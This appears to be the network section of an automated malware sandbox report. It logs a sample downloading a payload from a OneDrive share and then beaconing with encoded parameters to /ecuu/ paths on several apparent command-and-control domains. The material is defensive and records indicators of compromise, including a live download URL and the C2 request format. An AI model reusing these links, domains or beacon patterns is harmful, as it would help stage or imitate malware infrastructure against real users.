Network Analysis
- TCP Requests
-
-
192.168.56.101:49202 13.107.42.12:443acgxog.bn.files.1drv.com
-
192.168.56.101:49203 13.107.42.12:443acgxog.bn.files.1drv.com
-
192.168.56.101:49201 13.107.42.13:443onedrive.live.com
-
192.168.56.101:49228 184.168.131.241:80www.tehridam.com
-
192.168.56.101:49229 184.168.131.241:80www.tehridam.com
-
192.168.56.101:49219 209.99.64.55:80www.keplersark.com
-
192.168.56.101:49220 209.99.64.55:80www.keplersark.com
-
192.168.56.101:49221 34.102.136.180:80www.tasteofourneighborhood.com
-
192.168.56.101:49222 34.102.136.180:80www.tasteofourneighborhood.com
-
192.168.56.101:49226 34.102.136.180:80www.tasteofourneighborhood.com
-
192.168.56.101:49227 34.102.136.180:80www.tasteofourneighborhood.com
-
192.168.56.101:49217 75.2.18.233:80www.meo6.com
-
192.168.56.101:49218 75.2.18.233:80www.meo6.com
-
- UDP Requests
-
-
192.168.56.101:50851 164.124.101.2:53
-
192.168.56.101:54056 164.124.101.2:53
-
192.168.56.101:55450 164.124.101.2:53
-
192.168.56.101:56887 164.124.101.2:53
-
192.168.56.101:56977 164.124.101.2:53
-
192.168.56.101:57460 164.124.101.2:53
-
192.168.56.101:59369 164.124.101.2:53
-
192.168.56.101:60751 164.124.101.2:53
-
192.168.56.101:61479 164.124.101.2:53
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:62430 164.124.101.2:53
-
192.168.56.101:62902 164.124.101.2:53
-
192.168.56.101:65329 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:62327 239.255.255.250:1900
-
192.168.56.101:62329 239.255.255.250:3702
-
192.168.56.101:62331 239.255.255.250:3702
-
192.168.56.101:62333 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
8.8.8.8:53 192.168.56.101:55450
-
8.8.8.8:53 192.168.56.101:60751
-
8.8.8.8:53 192.168.56.101:62902
-
GET
302
https://onedrive.live.com/download?cid=D020578D515FAC65&resid=D020578D515FAC65%21115&authkey=ALSj_v3qn6Sm-X0
REQUEST
RESPONSE
BODY
GET /download?cid=D020578D515FAC65&resid=D020578D515FAC65%21115&authkey=ALSj_v3qn6Sm-X0 HTTP/1.1
User-Agent: zipo
Host: onedrive.live.com
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Location: https://acgxog.bn.files.1drv.com/y4msQ2m08EEz55CIox4ARzCARZSov_y6dCjL9KyqanqqW24yqFPyPmAgiFkMG2QbocQDtxoJAsMXRLcnBYdf8Vmf7dCAnr4ai6BcsbO0ode1OHkU4-B6Sxcc3qyHm0RZE5d-tYL-NoCSGPbNRA3cyLtIuCoQ-QdtoRv_MGoP5vP5pvjd4CsmpmBh0gXQQ5_PYLHYy5XUPfni0s7poAfWfxe5Q/Skxlgyfleozjvblodjbfwvxsubblvwz?download&psid=1
Set-Cookie: E=P:VGFNT2xu2Yg=:dQGo298djVi10ETIo7JF8tQS8oSzeaVsn+FilzU0Uc4=:F; domain=.live.com; path=/
Set-Cookie: xid=aa8d6c99-1290-4bd4-9ca7-9d1b7dd852c3&&RDE42AAC93A341&290; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Thu, 02-Sep-2021 22:09:31 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Thu, 09-Sep-2021 23:49:31 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: RDE42AAC93A341
X-ODWebServer: centralus0-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: 51713584C820461FB3764B09A97BC8A0 Ref B: SLAEDGE1116 Ref C: 2021-09-02T23:49:31Z
Date: Thu, 02 Sep 2021 23:49:31 GMT
Content-Length: 0
GET
200
https://acgxog.bn.files.1drv.com/y4msQ2m08EEz55CIox4ARzCARZSov_y6dCjL9KyqanqqW24yqFPyPmAgiFkMG2QbocQDtxoJAsMXRLcnBYdf8Vmf7dCAnr4ai6BcsbO0ode1OHkU4-B6Sxcc3qyHm0RZE5d-tYL-NoCSGPbNRA3cyLtIuCoQ-QdtoRv_MGoP5vP5pvjd4CsmpmBh0gXQQ5_PYLHYy5XUPfni0s7poAfWfxe5Q/Skxlgyfleozjvblodjbfwvxsubblvwz?download&psid=1
REQUEST
RESPONSE
BODY
GET /y4msQ2m08EEz55CIox4ARzCARZSov_y6dCjL9KyqanqqW24yqFPyPmAgiFkMG2QbocQDtxoJAsMXRLcnBYdf8Vmf7dCAnr4ai6BcsbO0ode1OHkU4-B6Sxcc3qyHm0RZE5d-tYL-NoCSGPbNRA3cyLtIuCoQ-QdtoRv_MGoP5vP5pvjd4CsmpmBh0gXQQ5_PYLHYy5XUPfni0s7poAfWfxe5Q/Skxlgyfleozjvblodjbfwvxsubblvwz?download&psid=1 HTTP/1.1
User-Agent: zipo
Host: acgxog.bn.files.1drv.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 272896
Content-Type: application/octet-stream
Content-Location: https://acgxog.bn.files.1drv.com/y4m_2DRKHAdlniCFdB7klO8kx_vk-vBREgM_uDdqZyMSCBkMzNKhUqugAEhh-__F_QydaDrePsYGkzCL5U9o2W5qsxCK-AJ5O7sEQDbYza2xQfK7p16ZlMsRnEjpFiXEKzdK60r7HRkIIEIBFv9qswHpk5Xte1lixA2DPwMmgQ3il31r-9_ZMhagKNqRbI1bz3k
Expires: Wed, 01 Dec 2021 23:49:32 GMT
Last-Modified: Thu, 02 Sep 2021 05:23:14 GMT
Accept-Ranges: bytes
ETag: D020578D515FAC65!115.2
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-MSNSERVER: BN2BAP9A47F95C2
Strict-Transport-Security: max-age=31536000; includeSubDomains
MS-CV: Ga0TpXpXrkCwEnZRxUyf1A.0
X-SqlDataOrigin: S
CTag: aYzpEMDIwNTc4RDUxNUZBQzY1ITExNS4yNTc
X-PreAuthInfo: rv;poba;
Content-Disposition: attachment; filename="Skxlgyfleozjvblodjbfwvxsubblvwz"
X-Content-Type-Options: nosniff
X-StreamOrigin: X
X-AsmVersion: UNKNOWN; 19.749.824.2003
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: FE83CD34BC6A4EC7A92D288058A1F0A0 Ref B: SLAEDGE1116 Ref C: 2021-09-02T23:49:31Z
Date: Thu, 02 Sep 2021 23:49:32 GMT
GET
302
https://onedrive.live.com/download?cid=D020578D515FAC65&resid=D020578D515FAC65%21115&authkey=ALSj_v3qn6Sm-X0
REQUEST
RESPONSE
BODY
GET /download?cid=D020578D515FAC65&resid=D020578D515FAC65%21115&authkey=ALSj_v3qn6Sm-X0 HTTP/1.1
User-Agent: aswe
Host: onedrive.live.com
Cache-Control: no-cache
Cookie: E=P:VGFNT2xu2Yg=:dQGo298djVi10ETIo7JF8tQS8oSzeaVsn+FilzU0Uc4=:F; xid=aa8d6c99-1290-4bd4-9ca7-9d1b7dd852c3&&RDE42AAC93A341&290; xidseq=1; wla42=
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Location: https://acgxog.bn.files.1drv.com/y4m7zPsFxg1v3fwqegpu63QQ7Fqy5_pkQlSDyodYXMkhDfs6Eqn0yvdAB_1nA0Mg0phAL6brhc-_wzn9DLIYxLRo85j16Plvt7WWn6XgOs8UGEv1lOweLvn8i3THvR44IPsolZ9HquJOzHeiCP5Qsolbxd7DhqPopNhWuDz6y0_Izi3L5QEZPtHC3V5xn34TUKOYuGoK6yyPWpMskHmo3fbLg/Skxlgyfleozjvblodjbfwvxsubblvwz?download&psid=1
Set-Cookie: E=P:f/IUUGxu2Yg=:JAB9Ot417wJdDLQulIsHNyj/ByPy8JxR1tG8AWMrE+U=:F; domain=.live.com; path=/
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Thu, 02-Sep-2021 22:09:32 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Thu, 09-Sep-2021 23:49:33 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: RDE42AAC93BE8C
X-ODWebServer: centralus0-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: 38BECA0072374FF09C7BC18C719964EB Ref B: SLAEDGE1116 Ref C: 2021-09-02T23:49:32Z
Date: Thu, 02 Sep 2021 23:49:32 GMT
Content-Length: 0
GET
200
https://acgxog.bn.files.1drv.com/y4m7zPsFxg1v3fwqegpu63QQ7Fqy5_pkQlSDyodYXMkhDfs6Eqn0yvdAB_1nA0Mg0phAL6brhc-_wzn9DLIYxLRo85j16Plvt7WWn6XgOs8UGEv1lOweLvn8i3THvR44IPsolZ9HquJOzHeiCP5Qsolbxd7DhqPopNhWuDz6y0_Izi3L5QEZPtHC3V5xn34TUKOYuGoK6yyPWpMskHmo3fbLg/Skxlgyfleozjvblodjbfwvxsubblvwz?download&psid=1
REQUEST
RESPONSE
BODY
GET /y4m7zPsFxg1v3fwqegpu63QQ7Fqy5_pkQlSDyodYXMkhDfs6Eqn0yvdAB_1nA0Mg0phAL6brhc-_wzn9DLIYxLRo85j16Plvt7WWn6XgOs8UGEv1lOweLvn8i3THvR44IPsolZ9HquJOzHeiCP5Qsolbxd7DhqPopNhWuDz6y0_Izi3L5QEZPtHC3V5xn34TUKOYuGoK6yyPWpMskHmo3fbLg/Skxlgyfleozjvblodjbfwvxsubblvwz?download&psid=1 HTTP/1.1
User-Agent: aswe
Host: acgxog.bn.files.1drv.com
Cache-Control: no-cache
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 272896
Content-Type: application/octet-stream
Content-Location: https://acgxog.bn.files.1drv.com/y4m_2DRKHAdlniCFdB7klO8kx_vk-vBREgM_uDdqZyMSCBkMzNKhUqugAEhh-__F_QydaDrePsYGkzCL5U9o2W5qsxCK-AJ5O7sEQDbYza2xQfK7p16ZlMsRnEjpFiXEKzdK60r7HRkIIEIBFv9qswHpk5Xte1lixA2DPwMmgQ3il31r-9_ZMhagKNqRbI1bz3k
Expires: Wed, 01 Dec 2021 23:49:33 GMT
Last-Modified: Thu, 02 Sep 2021 05:23:14 GMT
Accept-Ranges: bytes
ETag: D020578D515FAC65!115.2
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-MSNSERVER: BN2BAP67692D7A3
Strict-Transport-Security: max-age=31536000; includeSubDomains
MS-CV: USXZGfmQsUixNg6UGsf0rg.0
X-SqlDataOrigin: S
CTag: aYzpEMDIwNTc4RDUxNUZBQzY1ITExNS4yNTc
X-PreAuthInfo: rv;poba;
Content-Disposition: attachment; filename="Skxlgyfleozjvblodjbfwvxsubblvwz"
X-Content-Type-Options: nosniff
X-StreamOrigin: X
X-AsmVersion: UNKNOWN; 19.749.824.2003
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: F6B8374B465040B8AA97CBABFB8CED13 Ref B: SLAEDGE1013 Ref C: 2021-09-02T23:49:33Z
Date: Thu, 02 Sep 2021 23:49:33 GMT
POST
0
http://www.meo6.com/ecuu/
REQUEST
RESPONSE
BODY
POST /ecuu/ HTTP/1.1
Host: www.meo6.com
Connection: close
Content-Length: 286
Cache-Control: no-cache
Origin: http://www.meo6.com
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.meo6.com/ecuu/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
GET
403
http://www.meo6.com/ecuu/?QXNXP=uphTDjQ0dle&KnbdJ0x8=YvsDOebvdn33iOC+v2Ok61M54opkfPvcWjQzCgbatYYSU9v1OQaSbdzIzzvoqR0JelM+izEt
REQUEST
RESPONSE
BODY
GET /ecuu/?QXNXP=uphTDjQ0dle&KnbdJ0x8=YvsDOebvdn33iOC+v2Ok61M54opkfPvcWjQzCgbatYYSU9v1OQaSbdzIzzvoqR0JelM+izEt HTTP/1.1
Host: www.meo6.com
Connection: close
HTTP/1.1 403 Forbidden
Date: Thu, 02 Sep 2021 23:49:49 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Server: nginx
Vary: Accept-Encoding
POST
0
http://www.keplersark.com/ecuu/
REQUEST
RESPONSE
BODY
POST /ecuu/ HTTP/1.1
Host: www.keplersark.com
Connection: close
Content-Length: 286
Cache-Control: no-cache
Origin: http://www.keplersark.com
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.keplersark.com/ecuu/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
GET
200
http://www.keplersark.com/ecuu/?KnbdJ0x8=ErLy2cxkmBgc+vcby4/4OzScNwRwZNunoYkj9ouMgCM9dfa6mhMp1sEqnAK/47sh9WzSWDcB&QXNXP=uphTDjQ0dle
REQUEST
RESPONSE
BODY
GET /ecuu/?KnbdJ0x8=ErLy2cxkmBgc+vcby4/4OzScNwRwZNunoYkj9ouMgCM9dfa6mhMp1sEqnAK/47sh9WzSWDcB&QXNXP=uphTDjQ0dle HTTP/1.1
Host: www.keplersark.com
Connection: close
HTTP/1.1 200 OK
Date: Thu, 02 Sep 2021 23:49:55 GMT
Server: Apache
Set-Cookie: vsid=918vr3781721959824883; expires=Tue, 01-Sep-2026 23:49:55 GMT; Max-Age=157680000; path=/; domain=www.keplersark.com; HttpOnly
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_d6901ahroBMpnFZNA03bYcQQ3Xp8fdwrKxRcPkFruHFiDRBeChTc1IBGPd9lzGchTsezbLH2gPINNtxd6ma7Yw==
Keep-Alive: timeout=5, max=15
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
POST
405
http://www.poorwhitetrashlivesmatter.net/ecuu/
REQUEST
RESPONSE
BODY
POST /ecuu/ HTTP/1.1
Host: www.poorwhitetrashlivesmatter.net
Connection: close
Content-Length: 286
Cache-Control: no-cache
Origin: http://www.poorwhitetrashlivesmatter.net
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.poorwhitetrashlivesmatter.net/ecuu/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
HTTP/1.1 405 Not Allowed
Server: openresty
Date: Thu, 02 Sep 2021 23:50:07 GMT
Content-Type: text/html
Content-Length: 556
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_b7PY/MeJEq28zG5s15dfmXPj2yz8ACpUbcSe3pj37mAOpuujLFwg+KP+wDu/5zgwJ+6UflYTlnpZ7aEqJ9cPww
Via: 1.1 google
Connection: close
GET
403
http://www.poorwhitetrashlivesmatter.net/ecuu/?KnbdJ0x8=Pl7Wo/Sc18YTVh4ZfRYn9GaIW3hmPNugWLqq+bwHPa7GGyOQcNaR6G/8c/+q5jU1tNJ+hTp8&QXNXP=uphTDjQ0dle
REQUEST
RESPONSE
BODY
GET /ecuu/?KnbdJ0x8=Pl7Wo/Sc18YTVh4ZfRYn9GaIW3hmPNugWLqq+bwHPa7GGyOQcNaR6G/8c/+q5jU1tNJ+hTp8&QXNXP=uphTDjQ0dle HTTP/1.1
Host: www.poorwhitetrashlivesmatter.net
Connection: close
HTTP/1.1 403 Forbidden
Server: openresty
Date: Thu, 02 Sep 2021 23:50:07 GMT
Content-Type: text/html
Content-Length: 275
ETag: "6130ba19-113"
Via: 1.1 google
Connection: close
POST
405
http://www.tasteofourneighborhood.com/ecuu/
REQUEST
RESPONSE
BODY
POST /ecuu/ HTTP/1.1
Host: www.tasteofourneighborhood.com
Connection: close
Content-Length: 286
Cache-Control: no-cache
Origin: http://www.tasteofourneighborhood.com
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.tasteofourneighborhood.com/ecuu/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
HTTP/1.1 405 Not Allowed
Server: openresty
Date: Thu, 02 Sep 2021 23:50:59 GMT
Content-Type: text/html
Content-Length: 556
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_Wq6+9NYKwKB+hHf9nf77pUupMUBNGgEmyZaVZRa1rTO2hZ4RO49rzCrjMFPuwDMTVG07a8EEmKbeZTdWPNcN5g
Via: 1.1 google
Connection: close
GET
403
http://www.tasteofourneighborhood.com/ecuu/?KnbdJ0x8=2bt83kpOuVtEIWyxUzi5DXhitRFjdhq2G+J/5YNEy7Qmu4jdCi+MNXaEKclGMLIx7+ZhZc0n&QXNXP=uphTDjQ0dle
REQUEST
RESPONSE
BODY
GET /ecuu/?KnbdJ0x8=2bt83kpOuVtEIWyxUzi5DXhitRFjdhq2G+J/5YNEy7Qmu4jdCi+MNXaEKclGMLIx7+ZhZc0n&QXNXP=uphTDjQ0dle HTTP/1.1
Host: www.tasteofourneighborhood.com
Connection: close
HTTP/1.1 403 Forbidden
Server: openresty
Date: Thu, 02 Sep 2021 23:50:59 GMT
Content-Type: text/html
Content-Length: 275
ETag: "6130b7cc-113"
Via: 1.1 google
Connection: close
POST
0
http://www.tehridam.com/ecuu/
REQUEST
RESPONSE
BODY
POST /ecuu/ HTTP/1.1
Host: www.tehridam.com
Connection: close
Content-Length: 286
Cache-Control: no-cache
Origin: http://www.tehridam.com
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.tehridam.com/ecuu/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
GET
302
http://www.tehridam.com/ecuu/?KnbdJ0x8=52vxKUookbImOzTI7E+jd1wlXpyw0GfihJo0VkeqObbGxcjgEHmk7kL8PM63ES7BEXBsCGUk&QXNXP=uphTDjQ0dle
REQUEST
RESPONSE
BODY
GET /ecuu/?KnbdJ0x8=52vxKUookbImOzTI7E+jd1wlXpyw0GfihJo0VkeqObbGxcjgEHmk7kL8PM63ES7BEXBsCGUk&QXNXP=uphTDjQ0dle HTTP/1.1
Host: www.tehridam.com
Connection: close
HTTP/1.1 302 Found
Server: nginx/1.16.1
Date: Thu, 02 Sep 2021 23:51:12 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Location: https://afternic.com/domain/Tehridam.com?KnbdJ0x8=52vxKUookbImOzTI7E+jd1wlXpyw0GfihJo0VkeqObbGxcjgEHmk7kL8PM63ES7BEXBsCGUk&QXNXP=uphTDjQ0dle
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLSv1 192.168.56.101:49202 13.107.42.12:443 |
C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com | ec:e5:02:98:e6:c9:9a:12:fc:c0:4d:19:cd:2b:0c:ae:d0:c0:37:8e |
|
TLSv1 192.168.56.101:49201 13.107.42.13:443 |
C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01 | CN=onedrive.com | 50:2f:33:10:92:ac:27:7b:17:be:82:68:3b:e2:29:ad:97:41:b7:bb |
|
TLSv1 192.168.56.101:49203 13.107.42.12:443 |
C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com | ec:e5:02:98:e6:c9:9a:12:fc:c0:4d:19:cd:2b:0c:ae:d0:c0:37:8e |
Snort Alerts
No Snort Alerts